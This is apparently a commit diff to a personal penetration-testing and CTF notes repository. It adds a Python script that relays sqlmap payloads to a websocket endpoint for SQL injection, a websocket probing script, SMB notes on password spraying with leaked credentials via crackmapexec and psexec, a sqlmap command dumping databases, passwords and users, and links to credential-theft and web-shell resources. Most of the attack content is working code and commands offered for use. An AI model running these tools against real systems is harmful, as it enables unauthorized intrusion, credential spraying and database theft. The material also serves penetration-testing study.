bump

Enumeration/EnumScripts/websocket_enumeration.py

@@ -0,0 +1,40 @@
+#!/usr/bin/env python3
+
+
+import sys
+import json
+import websocket
+
+URL_PATH = ""
+if len(sys.argv) > 1:
+    URL_PATH = sys.argv[1]
+    if URL_PATH.startswith('/'):
+        URL_PATH = URL_PATH[1::]
+
+WEBSOCKET_URL = f"ws://example.com:5789/{URL_PATH}"
+
+
+def on_open(web_socket):
+    request = {
+        "test": "example"
+    }
+
+    if len(sys.argv) == 4:
+        request = {
+            f"{sys.argv[2]}": f"{sys.argv[3]}"
+        }
+    print(f"Sent:\n\n{json.dumps(request)}")
+    web_socket.send(json.dumps(request))
+
+
+def on_message(web_socket, message):
+    print(f"\nReceived:\n\n{message}")
+
+
+websocket_client = websocket.WebSocketApp(
+    WEBSOCKET_URL,
+    on_open=on_open,
+    on_message=on_message
+    )
+
+websocket_client.run_forever()

Enumeration/SMB.md

@@ -23,3 +23,22 @@ smbclient -L //$TARGET_IP/ --option='client min protocol=NT1'
 ```sh
 smbmap -u "admin" -p "password" -H "10.10.10.10" -x 'ipconfig'
 ```
+
+## Enumerate Domain Users
+
+List users of the domain through leaked credentials of an SMB user
+```sh
+crackmapexec smb example.com -u lowperm_user -p 'securepassword!' --users
+```
+
+Continue trying the found password on the users discovered in the step before
+```sh
+crackmapexec smb example.com -u domain_users.txt -p 'securepassword!' --continue-on-success
+```
+
+## Enumerate Writeable SMB shares
+
+List writeable SMB shares for found domain users via impacket's psexec
+```sh
+psexec.py example.com/domain.user@example.com
+```

Exploits/Databases/Scripts/sqlmap_websocket_server.py

@@ -0,0 +1,62 @@
+#!/usr/bin/env python3
+
+import sys
+from http.server import SimpleHTTPRequestHandler
+from socketserver import TCPServer
+from urllib.parse import unquote, urlparse
+from websocket import create_connection
+
+URL_PATH = ""
+if len(sys.argv) > 1:
+    URL_PATH = sys.argv[1]
+    if URL_PATH.startswith('/'):
+        URL_PATH = URL_PATH[1::]
+
+WS_SERVER = f"ws://example.com:5789/{URL_PATH}"
+
+
+def send_ws(payload):
+    ws = create_connection(WS_SERVER)
+    # res = ws.recv()
+    message = unquote(payload).replace('"', '\\"')
+    data = '{"version": "' + message + '"}'
+
+    ws.send(data)
+    res = ws.recv()
+    ws.close()
+
+    if res:
+        return res
+    return 0
+
+
+def middleware_server(host_port, content_type="text/plain"):
+
+    class CustomHandler(SimpleHTTPRequestHandler):
+        def do_GET(self) -> None:
+            self.send_response(200)
+            try:
+                payload = urlparse(self.path).query.split('=', 1)[1]
+            except IndexError:
+                payload = False
+            if payload:
+                content = send_ws(payload)
+            else:
+                content = "No payload specified"
+            self.send_header("Content-Type", content_type)
+            self.end_headers()
+            self.wfile.write(content.encode())
+
+    class _TCPServer(TCPServer):
+        allow_reuse_address = True
+
+    httpd = _TCPServer(host_port, CustomHandler)
+    httpd.serve_forever()
+
+
+print(f"Payload is sent to {WS_SERVER} via http://localhost:8081/?id=*")
+
+try:
+    middleware_server(('0.0.0.0', 8081))
+except KeyboardInterrupt:
+    pass

Exploits/Databases/Websocket SQLi.md

@@ -6,6 +6,26 @@
 sqlmap -u "http://127.0.0.1:8081/?id=62009" -p "id" --dbs
 ```
 
+## Usage
+
+First, make sure ` websocket-client` is installed from PyPi.
+
+Enumerate the websocket via [the websocket enumeration script](../../Enumeration/EnumScripts).
+You may provide the URL endpoint you want to request and the key, value of the request via the arguments in the following way
+```sh
+websocket_enumeration.py /values key value
+```
+
+I modified the script rayhan0x01 provides so that an endpoint can set. [The modified script](./Scripts/sqlmap_websocket_server.py) is started in the following way
+```sh
+sqlmap_websocket_server.py /endpoint
+```
+
+Start sqlmap requesting the `sqlmap_websocket_server` on localhost port 8081
+```sh
+sqlmap -u "http://127.0.0.1:8081/?id=1" --batch --risk 3 --level 5 --flush-session --dump --passwords --users
+```
+
 ## References
 
 * [rayhan0x01's git repo](https://github.com/rayhan0x01/nodejs-websocket-sqli)

Exploits/References.md

@@ -62,6 +62,7 @@
 
 [PowerSploit](https://github.com/PowerShellMafia/PowerSploit.git)
 [nishang](https://github.com/samratashok/nishang.git)
+[hacktricks' Places to steal ntlm creds](https://book.hacktricks.xyz/windows-hardening/ntlm/places-to-steal-ntlm-creds)
 
 # Exploits
 

Forensics/Wireshark.md

@@ -12,3 +12,9 @@ tshark -r keystrokes.pcapng -Y "usb.transfer_type==0x01 and frame.len==35 and! (
 python keystrokedecoder.py output.txt
 ```
 
+## Extracting Payload sent in DNS Request
+
+Search for the DNS requests containing the specific top level domain. 
+```sh
+tshark -r capture.pcapng  -Y 'dns && ip.dst==167.71.211.113 && (dns contains xyz)' -T fields -e dns.qry.name | awk -F '.' '{print $1}' | uniq > dns.out
+```

Reverse Shells/References.md

@@ -17,3 +17,7 @@
 
 [pentestmonkey's Reverse Shell Chea Sheet](https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
 [Arr0way's Reverse Shell Cheat Sheet](https://highon.coffee/blog/reverse-shell-cheat-sheet/)
+
+## Pw0nyShell
+
+Commandline Shell Inside the Browser Window is [flozz's p0wny shell](https://github.com/flozz/p0wny-shell.git)